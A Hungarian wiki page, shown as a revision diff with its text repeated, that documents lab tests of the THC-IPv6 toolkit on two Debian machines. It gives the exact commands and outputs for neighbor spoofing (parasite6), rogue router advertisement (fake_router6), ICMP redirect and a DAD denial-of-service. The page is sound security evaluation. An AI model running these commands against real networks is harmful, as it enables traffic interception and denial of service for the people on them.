Differences between revisions 4 and 5
Revision 4 as of 2007-12-14 11:23:50
Size: 1343
Editor: mohacsi
Comment:
Revision 5 as of 2008-01-15 08:01:55
Size: 6312
Comment:
Deletions are marked like this. Additions are marked like this.
Line 21: Line 21:

== A csomag telepítése ==

A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az `apt-get install ...` csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.

== THC tesztek ==

[[Képernyőképek]]

=== Alive6 ===
./alive6 eth0
Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478
Found 1 systems alive
Sikeresen felismerte a másik Linux-os gép Link Local IP címét.

=== Parasite6 ===
A spoofingot végző hoszt IP címei:
ip -6 addr
1: lo: <LOOPBACK,UP> mtu 16436
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000
    inet6 fec0::1/124 scope site
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fed8:f478/64 scope link
       valid_lft forever preferred_lft forever

Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):

./parasite6 eth0
Remember to enable routing (ip_forwarding), you will denial service otherwise!
Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001
Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002
Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503
Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003
Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004

A másik gépen ezután több fals szomszéd is látszik:
ip -6 neigh
fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE
fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE

=== Fake_router6 ===
Előtte:
ip -6 route
fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295
unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Jöhet a fals route beinjektálása:
./fake_router6 eth0 fe80::1 2001:2001::/32 1500
Starting to advertise router fe80::1 (Press Control-C to end) ...

Ezután a másik gép routing táblája:
ip -6 route
2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295
fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295
default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255
unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Látható, hogy valóban bekerült az új routing bejegyzés.

=== Redir6 ===
Előtte:
ip -6 route
fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295
fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295
ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295
unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Felvettem egy routot egy fec0::1:1 címre, ezt akarom majd eltéríteni.
./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1
Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.

=== Dos-new-ip6 ===
./dos-new-ip6 eth0
Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...
Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001
Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002
Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478
Valóban nem enged új interfészeket feljönni a linkre.

A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.

A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.

IPv6 specifikus hacking eszközök

A [http://freeworld.thc.org/thc-ipv6/ THC-IPv6] eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza:

  • alive6 - felderítő eszköz, adott címre válaszoló rendszerekhez

  • detect-new-ip6 - hálózathoz újonnan csatlakozó eszközök automatikus felderítése.

  • dos-new-ip6 - címütközés hamisítása és így az újonnan csatlakozó eszközök működésének megbénítása.

  • fake_advertiser6 - hirdetések hamisítása.

  • fake_mipv6 - mobil IP címek hamis kérése.

  • fake_mld6 - Multicas csoport üzenetek hamisítására

  • fake_router6 - Router üzenetek hamisítására, közbeékelődéses és forgalomelterelő támadásokhoz

  • parasite6 - ICMP6 neighbour solicitation üzenetek hamisítására, például beékelődéses támadások létrehozásához

  • redir6 - beékeléses támadás ICMP6 redirect üzenetek hamisításával

  • rsmurf6 - Távoli smurf támadás

  • sendpees6 - ND neighbour solicitation üzenetek generálás, a célpont CPU idejének fogyasztásához.

  • smurf6 - Helyi smirf támadás.

  • toobig6 - Hamis üzenetekkel MTU csökkentése.

A csomag telepítése

A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az apt-get install ... csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.

THC tesztek

Képernyőképek

Alive6

./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét.

=== Parasite6 === A spoofingot végző hoszt IP címei: ip -6 addr 1: lo: <LOOPBACK,UP> mtu 16436

  • inet6 ::1/128 scope host
    • valid_lft forever preferred_lft forever

2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000

  • inet6 fec0::1/124 scope site
    • valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fed8:f478/64 scope link
    • valid_lft forever preferred_lft forever

Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):

./parasite6 eth0 Remember to enable routing (ip_forwarding), you will denial service otherwise! Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ... Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002 Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004

A másik gépen ezután több fals szomszéd is látszik: ip -6 neigh fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE

Fake_router6

Előtte: ip -6 route fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Jöhet a fals route beinjektálása: ./fake_router6 eth0 fe80::1 2001:2001::/32 1500 Starting to advertise router fe80::1 (Press Control-C to end) ...

Ezután a másik gép routing táblája: ip -6 route 2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255 unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Látható, hogy valóban bekerült az új routing bejegyzés.

Redir6

Előtte: ip -6 route fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255 Felvettem egy routot egy fec0::1:1 címre, ezt akarom majd eltéríteni. ./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1 Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.

Dos-new-ip6

./dos-new-ip6 eth0 Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ... Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001 Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002 Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Valóban nem enged új interfészeket feljönni a linkre.

A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.

A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.

Campus6: IPv6hackingTools (last edited 2008-04-10 15:29:39 by localhost)